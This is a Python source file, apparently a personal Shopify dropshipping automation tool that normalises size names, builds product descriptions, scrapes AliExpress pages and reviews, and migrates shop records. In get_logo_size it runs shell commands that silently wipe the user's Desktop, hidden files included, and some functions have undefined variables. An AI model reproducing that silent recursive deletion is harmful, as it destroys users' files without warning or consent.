x = re_found_function(x,"(?i)X{3}l",lambda i:re_substitute(i,["(?i)X{3}l","3XL"]))
x = re_found_function(x,"(?i)X{2}l",lambda i:re_substitute(i,["(?i)X{2}l","2XL"]))
x = re_found_function(x,"(?i)^Xl$",lambda i:re_substitute(i,["(?i)^Xl$","XL"]))
x = re_found_function(x,"(?i)^Xs$",lambda i:re_substitute(i,["(?i)^Xs$","XS"]))
x = re_found_function(x,"(?i)^Xxs$",lambda i:re_substitute(i,["(?i)^Xxs$","XXS"]))
x = re_found_function(x,"(?i)^\d+Xl",lambda i:re_substitute(i,["(?i)(^\d+)Xl","\\1XL"]))
x = re_found_function(x,"(?i)^\d+Xs",lambda i:re_substitute(i,["(?i)(^\d+)Xs","\\1XS","\\1XS"]))
x = re_found_function(x,"(?i)\d+in",lambda i:re_substitute(i,["(?i)(\d+)in","\\1in"]))
x = re_found_function(x,"(?i)\d+cm",lambda i:re_substitute(i,["(?i)(\d+)cm","\\1cm"]))
x = re_found_function(x,"(?i)^asian",lambda i:re_substitute(i,["(?i)^asian",""]).strip())
# x = re_found_function(x,"(?i)cm",lambda i:re_substitute(re_substitute_function(i,"[\d\.]+",lambda i:or_list(lambda:list_and(lambda:str(round(flt(i)/2.54,1)).endswith(".0"),lambda:str(int(round(flt(i)/2.54,1)))),lambda:str(round(flt(i)/2.54,1)))),["(?i)cm","in"]) )
x = re_found_function(x,"(?i)^For",lambda i:re_substitute(i,["(?i)^For",""]).strip())
x = re_found_function(x,"(?i)iPhone",lambda i:re_substitute(i,["(?i)iPhone","iPhone"]).strip())
x = re_found_function(x,"(?i)iPhone",lambda i:re_substitute(i,["(?i)Xs","XS"]).strip())
x = re_found_function(x,"(?i)iPhone",lambda i:re_substitute(i,["(?i)Xr","XR"]).strip())
x = re_found_function(x,"(?i)iPhone",lambda i:re_substitute(i,["(?i)Se","SE"]).strip())
x = re_found_function(x,"(?i)iPhone",lambda i:re_substitute(i,["(?i)Xsmax","XS Max"]).strip())
x = re_found_function(x,"(?i)Style",lambda i:i)
x = re_found_function(x," {2,}",lambda i:re_substitute(i,[" {2,}"," "]))
x = re_found_function(x,"(?i)eu size",lambda i:re_substitute(i,["(?i)eu size",""]).strip())
x = re_found_function(x,"(?i)^Size[- ]",lambda i:re_substitute(i,["(?i)^Size[- ]",""]).strip())
x = re_found_function(x,"(?i)(^A\d+)",lambda i:re_substitute(i,["(?i)(^A\d+)","Samsung \\1"]).strip())
x = re_found_function(x,"(?i)(^J\d+)",lambda i:re_substitute(i,["(?i)(^J\d+)","Samsung \\1"]).strip())
x = re_found_function(x,"(?i)(^P\d+)",lambda i:re_substitute(i,["(?i)(^P\d+)","Huawei \\1"]).strip())
x = re_found_function(x,"(?i)^Galaxy",lambda i:re_substitute(re_substitute(i,["(?i)^Galaxy","Samsung Galaxy"]),["Samsung Galaxy","Samsung"]).strip())
x = re_found_function(x,"(?i)(^P Smart)",lambda i:re_substitute(i,["(?i)(^P Smart)","Huawei \\1"]).strip())
x = re_found_function(x,"(?i)(\d+)Xl",lambda i:re_substitute(i,["(?i)(\d+)Xl","\\1XL"]).strip())
x = re_found_function(x,"(?i)((?:^Xl$|^Xs$))",lambda i:re_substitute(i,["(?i)((?:^Xl$|^Xs$))","\\1"]).upper())
return x
def address_string_from_dict(x):
return ifelseget(lambda:x.get("address2"),lambda:"{first_name} {last_name}, {address1}, {address2}, {city}, {province_code} {zip} {country}".format(**{a:re.sub(" +"," ",str(b)).strip().title() for a,b in x.items()}),lambda:"{first_name} {last_name}, {address1}, {city}, {province_code} {zip} {country}".format(**{a:re.sub(" +"," ",str(b)).strip().title() for a,b in x.items()}))
def address_string_from_dict_2(x):
return ifelseget(lambda:x.get("Card Address Line2"),lambda:"{Card Name}, {Card Address Line1}, {Card Address Line2}, {Card Address City}, {Card Address State} {Card Address Zip} {Card Address Country}".format(**{a:re.sub(" +"," ",str(b)).strip().title() if a != "Card Address Country" else country_code_dict[b] for a,b in x.items()}),lambda:"{Card Name}, {Card Address Line1}, {Card Address City}, {Card Address State} {Card Address Zip} {Card Address Country}".format(**{a:re.sub(" +"," ",str(b)).strip().title() if a != "Card Address Country" else country_code_dict[b] for a,b in x.items()}))
def affix_option_names(p, shop):
p = shop.shopify.Product.find(id_=p.id)
data = {}
for i in p.options:
i = i.to_dict()
data[i["name"]] = i["values"]
print(i["name"], i["values"])
to_make_changes = input("to_make_changes to variant names (y/n): ")
#to_make_changes = "n"
if to_make_changes == "n":
print("Finished creating all variant changes")
return
changes = {}
while True:
x = input("q\old->new eg- 'XXL->2XL' : ")
if x=="q":break
old, new = x.split("->")
changes[old] = new
print("changes:\n%s\n"%changes)
for i in p.variants:
changed = False
for old,new in changes.items():
try:
if i.option1 == old:
i.option1 = new
changed = True
except : pass
try:
if i.option2 == old:
i.option2 = new
changed = True
except : pass
try:
if i.option3 == old:
i.option3 = new
changed = True
except : pass
if changed == True:
print("changed, saving")
i.save()
p = shop.shopify.Product.find(id_=p.id)
print("[Reminder] if you want to directly delete an option; as far as i know how, you would do it thru the browser")
return affix_option_names(p, shop)
def affix_product_descriptions():
#for shop in Shop.objects.filter(shop_abbreviation="aws"):
for shop in Shop.objects.all()[:1]:
shop = Shop()( shop.shop_abbreviation)
products = [i for i in getshopifyproducts(shop) if len(Product.objects.filter(id=i.id)) > 0]
products = [i for i in products if Product.objects.get(id=i.id).description!=None]
for idx,p in enum(products):
#p = affix_product_title(p)
#distinct_print(describe_product(p))
zz(0.5)
try:
Shop()(shop.shop_abbreviation)
distinct_print(describe_product(p)[:25])
except Exception as e:
redprint("[%s][%s][affix_product_descriptions]"%(idx,e))
def append_pictures():
workmode = None
if Muta()().sciencevessels_on:
x = list(All(ScienceVessel))[-1]
y = {"index":None, "urls":None}
io = OSA.log("Enter in a number to specify the image (usually 0 or -1) and then the urls. Delimit with ', '").split(", ")
index = int(io[0])
urls = io[1:]
y["index"] = io
y["urls"] = urls
x.append_pictures = url
x.save()
else:
io = OSA.log("Enter in a number to specify the image (usually 0 or -1) and then the urls. Delimit with ', '").split(", ")
product = list(All(Product))[-1]
index = int(io[0])
if index < 0:
index = len(product.images) + index + 1
urls = io[1:]
product_ = Shop()(product.shop).pfind(id_=product.id)
images = lmap(lambda i: {"attachment": i}, pool(lambda i: Images().image_base64(i), pool(Images().sharpen, pool(Images().download, urls).result()).result()).result())
product_.images = product_.images[:index] + images + product_.images[index:]
product_.save()
def create_navigation_menu_items(shop, menu_name, menu_items):
shop.Login_Shopify_Store()
globals().update(g.__globals__)
ss.get("{}/menus".format(shop.Administrative_Url))
for i in ss.fcns("next-table__cell--full-width-when-condensed"):
if i.text == menu_name:
ss.get(ss.fxsxs(i)[0].get_attribute("href"))
x = []
for idx, i in enum(menu_items):
print("idx: %s, total: %s" % ((idx+1), len(menu_items)))
ss.fcn("menu__add-menu-item").click().sp(3)
ss.fid("addMenuItemLink").send_keys(i).sp(3)
ss.tp(lambda: ss.jtns("a","click",{"data-bind-event-click":'itemSelected(event, "collection")'},_time=2)).sp(2)
if tryprocess(lambda: ss.fcns("next-list__item--disabled",_time=2)[0].text.split("result")[0].strip()) == 1:
if 1 != int(ss.fcns("next-list__item--disabled",_time=4)[0].text.split("result")[0].strip()):
x.append(i)
ss.fid("addMenuItemLink").send_keys(ss.Keys.ARROW_DOWN).sp(3)
ss.fid("addMenuItemLink").send_keys(ss.Keys.ARROW_DOWN).sp(3)
ss.fid("addMenuItemLink").send_keys(ss.Keys.ENTER).sp(4)
ss.ffst("button","Add").click().sp(5)
ss.ffs("button","aria-label","Save").click().sp(7)
def delete_product_images(shop_abbreviation, id_):
shop = Shop()( shop_abbreviation)
p = shop.shopify.Product.find(id_=id_)
images = input("Images delimited by ',' ie 2,4,5,6 : ")
images_numbers = list(map(int, images.split(",")))
previous_image_count = len(p.images)
print("previous image count: %s" % previous_image_count)
for i in images_numbers:
p.images[i].destroy()
p = shop.shopify.Product.find(id_=id_)
new_image_count = len(p.images)
print("new image count: %s" % new_image_count)
deleted_count = previous_image_count - new_image_count
print("deleted count: %s" % deleted_count)
return None
def describe_product(p):
if type(p) == Product: p = Shop()( p.shop).shopify.Product.find(id_=p.id)
i = Product.objects.get(id=p.id)
description = i.description
shop = Shop()( Product.objects.get(id=p.id).shop)
get_size_chart = lambda product_type: Sizechart.objects.get(product_type=product_type).size_chart
#if p.image == None: return "product image was None"
#if p.image.alt == None: return "product image alt was None"
x = ((( (( description if description != None else """""" )) + (( "<p></p>" )) ))) + \
((( (( shop.product_page_general_information )) + (( "<p></p>" )) )))
if i.size_chart != None and i.is_available() and i.product_type in SIZE_CHART_PRODUCT_TYPES and i.shop != None:
if i.is_unavailable():
""
elif i.size_chart == "Unmatched":
"None/Text in <p>/Redo"
else:
size_chart_string_size_chart = ""
if i.size_chart[0].startswith("http"):
if len(i.size_chart) == 1:
for b in i.size_chart:
size_chart_string_size_chart += """<img src="{}" alt="Size Chart" />""".format(b)
elif len(i.size_chart) > 1:
for b in i.size_chart[-1:]:
size_chart_string_size_chart += """<img src="{}" alt="Size Chart" />""".format(b)
elif not i.size_chart[0].startswith("http"):
if len(i.size_chart) == 1:
for b in i.size_chart[-1:]:
size_chart_string_size_chart += b
size_chart_string_size_chart += "<br />"
elif len(i.size_chart) > 1:
for b in i.size_chart:
size_chart_string_size_chart += b
size_chart_string_size_chart += "<br />"
size_chart_string = """<p><strong>Size Chart*<br />{}<br /></strong>*This size chart is specifically for this item.</p>""".format(size_chart_string_size_chart)
#distinct_print(size_chart_string)
x = re.sub(r"(<p.*?<table.*</table>)", "<br /><br />%s"%size_chart_string, x)
try:
if p.image == None: p.destroy(); return
except Exception as e:
print(e)
x = x.replace("\xa0", "").replace("\n", "<br />")
# x is the description you should be creating.
# if database product's body_html is not x... then save.
# so if `i`.body_html != x:
if i.body_html != x:
i.body_html = x; i.save()
p.body_html = x
assert p.save() == True
distinct_print("[different body html][saving][%s]" % p.id)
else:
distinct_print("[same body_html][not saving][%s]"%p.id, end="")
return x
def delete_product(x):
if type(x) == int: x = Get(Product,id=x)
tp(lambda:Del(Get(GhostProduct,id=x.id)))
pool(lambda:[apilimitcall(lambda:x.p().destroy()),print(apilimitcall(lambda:Shop()(x.shop).pfind(handle=x.handle)))])
print("deleting product")
tp(lambda:Del(x))
def generate_price_list():
v={0:9.95,1: 9.95,2: 9.95,3: 9.95,4: 9.95,5: 12.99,6: 12.99,7: 14.99,8: 17.99,9: 17.99,10: 18,11: 22,12: 23,13: 23,14: 29.99,15: 29.99,16: 34,17: 38,18: 40,19: 40,20: 42,21: 42,22: 45,23: 49,24: 50,25: 54,26: 55,27: 59,28: 60,29: 60,30: 61,31: 62,32: 63,33: 64,34: 68,35: 70,36: 71,37: 71,38: 75,39: 80,40: 82,41: 85,42: 85,43: 85,44: 88,45: 90,46: 90,47: 100,48: 100,49: 100,50: 100}
v={0:9.99,1: 9.99,2: 9.99,3: 9.99,4: 12.99,5: 12.99,6: 12.99,7: 17.99,8: 17.99,9: 17.99,10: 17.99,11: 24.99,12: 24.99,13: 24.99,14: 24.99,15: 29.99,16: 38,17: 39,18: 40,19: 40,20: 42,21: 42,22: 45,23: 49,24: 50,25: 54,26: 55,27: 59,28: 60, 29: 60,30: 61,31: 62,32: 63,33: 64,34: 68,35: 70,36: 71,37: 71,38: 75,39: 80,40: 82,41: 85,42: 85,43: 85,44: 88,45: 90,46: 90,47: 100,48: 100,49: 100,50: 100}
ne={}
for i in lrange(5000):
q = i/100
#print(q)
try:
low,high = [i for i in v if i < q][-1], [i for i in v if i>q][-0]
print(low,q,high)
assert low < q < high
ne[float(q)] = v[high]
print(q,v[high])
except:
print(q)
return ne
def get_added_product_urls(x):
products_sent = x
products = []
for i in products_sent:
x = Filter(Product,title=i.title)
products.extend(x)
urls = []
for i in products:
x = get_product_url(i)
urls.append(x)
urls = oset(urls)
for i in products:
print(Filter(Product,title=i.title))
print(Filter(GhostProduct,title=i.title))
return urls
def get_all_products_all_shops_created_at_time(x):
return sum([Shop()(i.shop_abbreviation).pfind(created_at_min=x) for i in Shop.objects.all()],[])
def get_all_custom_collections(shop):
return flatten(lmap(lambda i: Shop()(shop).shopify.CustomCollection.find(status="any",limit=250,page=i+1),list(range(int(Shop()(shop).shopify.CustomCollection.count()/250)+1))),1)
def get_handle_from_title(x):
return re.sub(r"[-]+","-",re.sub(r" ","-","".join(re.findall(r"[0-9a-zA-Z ]",x)).lower()))
def get_logo_size():
import cv2
system("rm -rf ~/Desktop/.* &>/dev/null")
x = lmap(lambda i:int(i),list(cv2.imread(homepath("~/Desktop/%s"%os.listdir(homepath("~/Desktop"))[0])).shape)[:2] )
# x = lmap(lambda i:int(i/2),list(cv2.imread(homepath("~/Desktop/%s"%os.listdir(homepath("~/Desktop"))[0])).shape)[:2] )
system("rm -rf ~/Desktop/* &>/dev/null")
return x
def get_product_video(r):
ss = Browser()("ch+")
try:
ss.get(r,timeout=10)
except Exception as e:
redprint(e)
OSA.notify(str(e))
return get_product_video(r)
url = ss.ftn("video",2).get_attribute("src")
ss.quit()
return url
def getshopifyproducts(shop,**kwargs):
if type(shop) is str: shop = Shop()( shop)
products = sum([shop.shopify.Product.find(status='any',limit=250,page=pg,**kwargs) for pg in range(1,(ceil(shop.shopify.Product.count()/250)+1))],[])
return products
def handle_captcha(url):
captcha = OSA.log("Handle captcha", tp = False)
return captcha
def handle_security_page(ss):
if "sec.aliexpress.com" in ss.current_url:
captcha = handle_captcha(url)
ss.fid("checkcodeInput").send_keys(captcha.get("text"))
ss.ffs("div","class","submit").click()
time.sleep(5)
handle_security_page(ss)
else:
redprint("ok")
return
def productsFeed(shop, created_at_min = 365 * 4 ) :
shop=((Shop()(shop))if(type(shop)==str)else(shop))
"""
shop = a_shop()
created_at_min = 365
"""
product_count = shop.shopify.Product.count()
kwargs = dict( status="any" , created_at_min = datetime.now()-timedelta(days=created_at_min) , limit=250 )
products = [AttrDict({ ("shop")if("vendor"==a)else(a):( getattr(shop,"init_shop")if("vendor"==a) else(Date().parse_date(b)) if("created_at"==a) else(b) ) for a,b in x.to_dict().items() if a not in ["admin_graphql_api_id","image"]}) for x in apilimitcall(lambda:shop.pfind(page=1, **kwargs))] if ceil( (product_count/250) ) >= 1 else [redprint("1"),[]][1] +\
[AttrDict({ ("shop")if("vendor"==a)else(a):( getattr(shop,"init_shop")if("vendor"==a) else(Date().parse_date(b)) if("created_at"==a) else(b) ) for a,b in x.to_dict().items() if a not in ["admin_graphql_api_id","image"]}) for x in apilimitcall(lambda:shop.pfind(page=2, **kwargs))] if ceil( (product_count/250) ) >= 2 else [redprint("2"),[]][1] +\
[AttrDict({ ("shop")if("vendor"==a)else(a):( getattr(shop,"init_shop")if("vendor"==a) else(Date().parse_date(b)) if("created_at"==a) else(b) ) for a,b in x.to_dict().items() if a not in ["admin_graphql_api_id","image"]}) for x in apilimitcall(lambda:shop.pfind(page=3, **kwargs))] if ceil( (product_count/250) ) >= 3 else [redprint("3"),[]][1] +\
[AttrDict({ ("shop")if("vendor"==a)else(a):( getattr(shop,"init_shop")if("vendor"==a) else(Date().parse_date(b)) if("created_at"==a) else(b) ) for a,b in x.to_dict().items() if a not in ["admin_graphql_api_id","image"]}) for x in apilimitcall(lambda:shop.pfind(page=4, **kwargs))] if ceil( (product_count/250) ) >= 4 else [redprint("4"),[]][1] +\
[AttrDict({ ("shop")if("vendor"==a)else(a):( getattr(shop,"init_shop")if("vendor"==a) else(Date().parse_date(b)) if("created_at"==a) else(b) ) for a,b in x.to_dict().items() if a not in ["admin_graphql_api_id","image"]}) for x in apilimitcall(lambda:shop.pfind(page=5, **kwargs))] if ceil( (product_count/250) ) >= 5 else [redprint("5"),[]][1] +\
[AttrDict({ ("shop")if("vendor"==a)else(a):( getattr(shop,"init_shop")if("vendor"==a) else(Date().parse_date(b)) if("created_at"==a) else(b) ) for a,b in x.to_dict().items() if a not in ["admin_graphql_api_id","image"]}) for x in apilimitcall(lambda:shop.pfind(page=6, **kwargs))] if ceil( (product_count/250) ) >= 6 else [redprint("6"),[]][1] +\
[AttrDict({ ("shop")if("vendor"==a)else(a):( getattr(shop,"init_shop")if("vendor"==a) else(Date().parse_date(b)) if("created_at"==a) else(b) ) for a,b in x.to_dict().items() if a not in ["admin_graphql_api_id","image"]}) for x in apilimitcall(lambda:shop.pfind(page=7, **kwargs))] if ceil( (product_count/250) ) >= 7 else [redprint("7"),[]][1] +\
[AttrDict({ ("shop")if("vendor"==a)else(a):( getattr(shop,"init_shop")if("vendor"==a) else(Date().parse_date(b)) if("created_at"==a) else(b) ) for a,b in x.to_dict().items() if a not in ["admin_graphql_api_id","image"]}) for x in apilimitcall(lambda:shop.pfind(page=8, **kwargs))] if ceil( (product_count/250) ) >= 8 else [redprint("8"),[]][1] +\
[AttrDict({ ("shop")if("vendor"==a)else(a):( getattr(shop,"init_shop")if("vendor"==a) else(Date().parse_date(b)) if("created_at"==a) else(b) ) for a,b in x.to_dict().items() if a not in ["admin_graphql_api_id","image"]}) for x in apilimitcall(lambda:shop.pfind(page=9, **kwargs))] if ceil( (product_count/250) ) >= 9 else [redprint("9"),[]][1] +\
[AttrDict({ ("shop")if("vendor"==a)else(a):( getattr(shop,"init_shop")if("vendor"==a) else(Date().parse_date(b)) if("created_at"==a) else(b) ) for a,b in x.to_dict().items() if a not in ["admin_graphql_api_id","image"]}) for x in apilimitcall(lambda:shop.pfind(page=10, **kwargs))] if ceil( (product_count/250) ) >= 10 else [redprint("10"),[]][1]
total_updated = 0
globalise(0,"errors")
for x in products:
if x.id in sud("id",All(Product)):
try:Get(Product,id=x.id).feed(x)
except Exception as e:[print(e),globalise(globe("errors")+1,"errors")]
InceptedProduct().handle_update(x)
total_updated += 1
else:
blueprint("skipping id: %s" % (x.id))
OSA.notify("ProductsFeed total updated: %s" % (total_updated))
OSA.notify("ProductsFeed errors: %s" % (errors))
return products
def productsFeedNonDicts(shop):
products = sum([shop.shopify.Product.find(status='any',limit=250, page=pg) for pg in range(1,10)],[])
return products
def proper_title_input(store_abbre):
title = input("title? (this will return a redirect url as well): ")
existing_titles = Shop()( store_abbre).shopify.Product.find(title=title)
if len(existing_titles) > 0:
print("title exists, ")
return proper_title_input(store_abbre)
else:
print("%s not existing in %s" % (title, store_abbre))
# ok
shop = Shop()(store_abbre)
desired_path = redinput("desired path? (/x-y-z): ")
path = automatically_generated_handle = "/" + "".join(re.findall(r"[0-9a-zA-Z ]",title)).lower().replace(" ","-").replace("--","-").replace("--","-")
target = automatically_generated_target = shop.Domain_Name + "/products" + automatically_generated_handle
x = create_redirect(shop, desired_path, automatically_generated_target)
redirect_url = x
return [title, redirect_url]
def remove_extra_note_error_in_image_alt(product):
# note images need to save individually
i = product
if i.image == None:return
if i.image.alt != None and "Note" in i.image.alt:
i.image.alt = re.sub("Note.*","",i.image.alt)
print(i.image.alt)
i.image.save()
time.sleep(0.5)
for j in i.images:
if j.alt != None and "Note" in j.alt:
j.alt = re.sub("Note.*","",j.alt)
j.save()
time.sleep(0.5)
print(j.alt)
def rename_product_variants(shop_abbreviation, id_):
p = Shop()(shop_abbreviation).shopify.Product.find(id_=id_)
rename_dict = {}
while True:
x = input("q\old->new: ")
if x == "q":
break
old, new = x.split("->")
rename_dict[old] = new
changed_data = []
for v in p.variants:
for old in rename_dict:
changed = False
if v.option1 == old:
v.option1 = rename_dict[old]
changed = True
changed_data.append("Hello; changed %s to %s" % (old, rename_dict[old]))
if v.option2 == old:
v.option2 = rename_dict[old]
changed = True
changed_data.append("Hello; changed %s to %s" % (old, rename_dict[old]))
if v.option3 == old:
v.option3 = rename_dict[old]
changed = True
changed_data.append("Hello; changed %s to %s" % (old, rename_dict[old]))
if changed == True:
v.save()
print("\n".join(changed_data))
def republish_product(p):
p.published_at = datetime.now().strftime("%Y-%m-%dT-%HP:%M:%S-04:00")
assert(True==p.save())
redprint("set [%s][%s][published_at][%s]"%(p.id,p.handle,p.published_at))
return p
def save_and_return(x):
if type(x) != shopify.product.Product:
x = shopify.product.Product(x)
distinct_print("[saving product] .. [%s]"%x.save())
return x
def sort_variants(x):
option1s = oset(sud("option1",x))
'''exec("""print(str(x).replace("},","},\\n"))""")'''
print(option1s)
new_list = []
for option in option1s:
for i in x:
if i["option1"] == option:
new_list.append(i)
option2s = oset(sud("option2",new_list))
'''exec("""print(str(new_list).replace("},","},\\n"))""")'''
print(option2s)
new_list_ = []
for option in option1s:
for option_ in option2s:
for i in new_list:
if i["option1"] == option:
if i["option2"] == option_:
new_list_.append(i)
if "option3" not in new_list_[0].keys():
'''exec("""print(str(new_list_).replace("},","},\\n"))""")'''
return new_list_
else:
option3s = oset(sud("option3",new_list))
'''exec("""print(str(new_list_).replace("},","},\\n"))""")'''
print(option3s)
new_list__ = []
for option in option1s:
for option_ in option2s:
for option__ in option3s:
for i in new_list_:
if i["option1"] == option:
if i["option2"] == option_:
if i["option3"] == option__:
new_list__.append(i)
'''exec("""print(str(new_list__).replace("},","},\\n"))""")'''
return new_list__
def txt_to_dictlist(txt, headers):
data = txt.split("\n\n")
payload = []
for a in data:
x = OrderedDict()
for b, c in zip(a.split("\n"), headers):
x[c] = b
payload.append(x)
return payload
def unpublish_product(p):
p.published_at = None
assert(True==p.save())
redprint("set [%s][%s][published_at][%s]"%(p.id,p.handle,None))
return p
def unsplash_download(v):
os.makedirs(homepath("~/Documents/%s"%v), exist_ok=True)
setitem(globals(),"idx",0)
address_url_dict = {}
results = [[setitem(globals(),"fn", homepath("~/Documents/%s/%s_%s.png"%(v,str(globals()["idx"]).zfill(3),v)) ),tryprocess(Images().download,x,fn),redprint(fn),setitem(address_url_dict,fn,x),setitem(globals(),"idx",globals()["idx"]+1),] for x in [x["urls"]["regular"] for x in sum([json.loads(requests.get("https://unsplash.com/napi/search/photos?query=%s&xp=&per_page=20&page=%s"%(v.replace(" ","+"),i)).text)["results"] for i in range(1,1+ceil(int(re.findall(r"([0-9]+) free .*? pictures", requests.get("https://unsplash.com/search/photos/{}".format(k.replace(" ","+"))).text)[0])/20))[:50]], [])]]
json.dump(address_url_dict, open(homepath("~/Documents/%s/address_url_dict.json"%v), "w"))
class Aliexpress_Products:
def __init__(self):
self.rq = Aliexpress_Requests()()
def get_product_data(self, url,check_for_epacket=False):
x = AD(data = None, shipping = None, y = None)
count_of_soups = Filter(Soup,url=url).len()
time_elapsed = or_list(lambda: (Date().Now()-Get(Soup,url=url).last_check).total_seconds(), None)
TO_REFRESH_SOUP = False
assert count_of_soups > 0
if time_elapsed > (86400*2):
TO_REFRESH_SOUP = True
if TO_REFRESH_SOUP == True:
Push(Soup,url=url)(page_source=self.rq.get(url).text,is_available=True,last_check=Date().Now())
soup = SOUP(Get(Soup,url=url).page_source)
if not soup.text and TO_REFRESH_SOUP == False:
print("Not Found")
x.data = str(soup)
x.y = "Not Found"
return x
item_not_found = None
if len(soup.findAll("div",attrs={"class":"item-not-found-title"})):
item_not_found = True
if "Page Not Found" in soup.findAll("title")[0].text:
item_not_found = True
aliexpressvendor = or_list(tryreturn(lambda:"https:%s" % list(soup.findAll("span",attrs={"class":"shop-name"})[0])[1].attrs["href"]) , tryreturn(lambda:"https:%s" % list(soup.findAll("span",attrs={"class":"shop-name"})[0])[0].findAll("a")[0].attrs["href"]) , tryreturn(lambda:"https://aliexpress.com/store/%s"%(findall(Get(Soup,url=url).page_source,1,'(?s)window.runParams.*"storeNum":(\d+)'))) , None)
if item_not_found:
x.y = "Not Found"
if aliexpressvendor == None:
x.y = "Not Found"
shipping = None
if x.y != "Not Found":
shipping = json.loads(findall(requests.get("https://freight.aliexpress.com/ajaxFreightCalculateService.htm?&f=d&productid={}¤cyCode=USD&transactionCurrencyCode=USD&sendGoodsCountry=&country=US&province=&city=&abVersion=1".format(int(findall(findall(Get(Soup,url=url).page_source,1,'(?s)window.runParams.*productIds: "(.*?)"'),1,".*?(\d+)")))).text,1,"{.*}"))["freight"]
if check_for_epacket:
if "ePacket" not in key("companyDisplayName",shipping):
x.y = "No ePacket"
x.data = str(soup)
x.shipping = shipping
return x
class Posts:
def start(self,shop):
products = Filter(Product,shop=shop)
for i in products:
create_directories(i.shop,i.product_type,i.handle)
os.chdir("/".join([i.shop,i.product_type,i.handle]))
self.run(int(findall(i.ali_url,1,"(\d+)\.html")))
os.chdir("/".join([".."]*3))
def run(self,product_id):
x = []
page_number = 1
url = "https://feedback.aliexpress.com/display/productEvaluation.htm"
data = {'companyId':'','currentPage':'1','evaSortValue':'sortdefault@feedback','evaStarFilterValue':'all Stars','i18n':'true','isOpened':'true','jumpToTop':'false','memberType':'seller','onlyFromMyCountry':'false','ownerMemberId':'229975677','page':'1','productId':'32924594152','startValidDate':'','translate':' Y ','v':'2','version':'','withAdditionalFeedback':'false','withPersonalInfo':'false','withPictures':'true'}
headers = {'accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8','accept-encoding':'gzip, deflate, br','accept-language':'en-US,en;q=0.9','authority':'feedback.aliexpress.com','cache-control':'max-age=0','content-length':'334','content-type':'application/x-www-form-urlencoded','method':'POST','origin':'https://feedback.aliexpress.com','path':'/display/productEvaluation.htm','referer':'https://feedback.aliexpress.com/display/productEvaluation.htm','scheme':'https','upgrade-insecure-requests':'1','user-agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'}
data["productId"] = str(product_id)
data['page'] = str(page_number)
r = requests.post(url,headers=headers,data=data)
images = BeautifulSoup(r.text).findAll("img")
page_numbers = listminus(lmap(lambda i:tryreturn(lambda:int(i)),sud("text",BeautifulSoup(r.text).findAll("a",attrs={"class":"ui-goto-page"}))),0)
x.append(images)
if page_number+1 in page_numbers:
while True:
page_number = page_number + 1
url = "https://feedback.aliexpress.com/display/productEvaluation.htm"
data = {'companyId':'','currentPage':'1','evaSortValue':'sortdefault@feedback','evaStarFilterValue':'all Stars','i18n':'true','isOpened':'true','jumpToTop':'false','memberType':'seller','onlyFromMyCountry':'false','ownerMemberId':'229975677','page':'1','productId':'32924594152','startValidDate':'','translate':' Y ','v':'2','version':'','withAdditionalFeedback':'false','withPersonalInfo':'false','withPictures':'true'}
headers = {'accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8','accept-encoding':'gzip, deflate, br','accept-language':'en-US,en;q=0.9','authority':'feedback.aliexpress.com','cache-control':'max-age=0','content-length':'334','content-type':'application/x-www-form-urlencoded','method':'POST','origin':'https://feedback.aliexpress.com','path':'/display/productEvaluation.htm','referer':'https://feedback.aliexpress.com/display/productEvaluation.htm','scheme':'https','upgrade-insecure-requests':'1','user-agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'}
data["productId"] = str(product_id)
data['page'] = str(page_number)
r = requests.post(url,headers=headers,data=data)
images = BeautifulSoup(r.text).findAll("img")
page_numbers = listminus(lmap(lambda i:tryreturn(lambda:int(i)),sud("text",BeautifulSoup(r.text).findAll("a",attrs={"class":"ui-goto-page"}))),0)
x.append(images)
if page_number+1 not in page_numbers:
break
pool(lambda idx,i:Images().download(i,"%s.jpg"%(idx)),lrange(len(flatten(x,1))),lmap(lambda i:i.attrs["src"],flatten(x,1))).result()
print("+1, %s" % (len(flatten(x,1))))
class ProductTroubleshoot:
def remove_int_handles(self,shop):
x=getshopifyproducts(shop)
for i in x:
y = i.handle[-1]
if tryprocess(lambda i:int(y)):
i.destroy()
def migrate_shop_add_new_shop_object(self):
All(Shop)[2:]
shops = All(Shop)[2:]
uniq = ["id","shop_abbreviation"]
s = All(Shop)[0]
for shop in shops:
for field in Shop._meta.fields:
if field.name not in uniq:
setattr(shop,field.name,getattr(s,field.name))
print(field.name,getattr(s,field.name))
shop.save()
def update_shops(self,shop1,shop2):
Filter(AceInTheHole,shop=shop1).update(shop=shop2) #
Filter(AceInTheHoleHeaderColumns,shop=shop1).update(shop=shop2) #
Filter(AddProduct,shop=shop1).update(shop=shop2) #
Filter(Adset,shop_abbreviation=shop1).update(shop_abbreviation=shop2)
Filter(Adsethourlyinsightdata,shop_abbreviation=shop1).update(shop_abbreviation=shop2)
Filter(Aliexpress_Dispute,shop=shop1).update(shop=shop2)
Filter(Aliexpress_Dispute,store=shop1).update(store=shop2)
Filter(Aliexpressorder_event,shop=shop1).update(shop=shop2)
Filter(Aliexpressorder_update,shop=shop1).update(shop=shop2)
Filter(ApprovedTransaction,shop=shop1).update(shop=shop2) #
Filter(GhostProduct,shop=shop1).update(shop=shop2)
Filter(GhostProductUpdate,shop=shop1).update(shop=shop2)
Filter(Handle,shop=shop1).update(shop=shop2)
Filter(InceptedProduct,shop=shop1).update(shop=shop2)
Filter(Keep_Exchange,shop=shop1).update(shop=shop2) #
Filter(Lineitem,shop=shop1).update(shop=shop2)
Filter(LineitemsFeed,shop=shop1).update(shop=shop2)
Filter(Muta,current_shop=shop1).update(current_shop=shop2) #
Filter(Muta,store_abbre=shop1).update(store_abbre=shop2) #
Filter(New_Email,shop=shop1).update(shop=shop2)
Filter(New_Email_Template,shop=shop1).update(shop=shop2)
Filter(Order,shop=shop1).update(shop=shop2)
Filter(Payment,shop=shop1).update(shop=shop2)
Filter(Payout,shop=shop1).update(shop=shop2)
Filter(PriceChange,shop=shop1).update(shop=shop2) #
Filter(Product,shop=shop1).update(shop=shop2)
Filter(ProductsFeed,shop=shop1).update(shop=shop2)
Filter(ProductTalk,shop=shop1).update(shop=shop2)
Filter(ReOrder,shop=shop1).update(shop=shop2)
Filter(ScienceVessel,shop=shop1).update(shop=shop2)
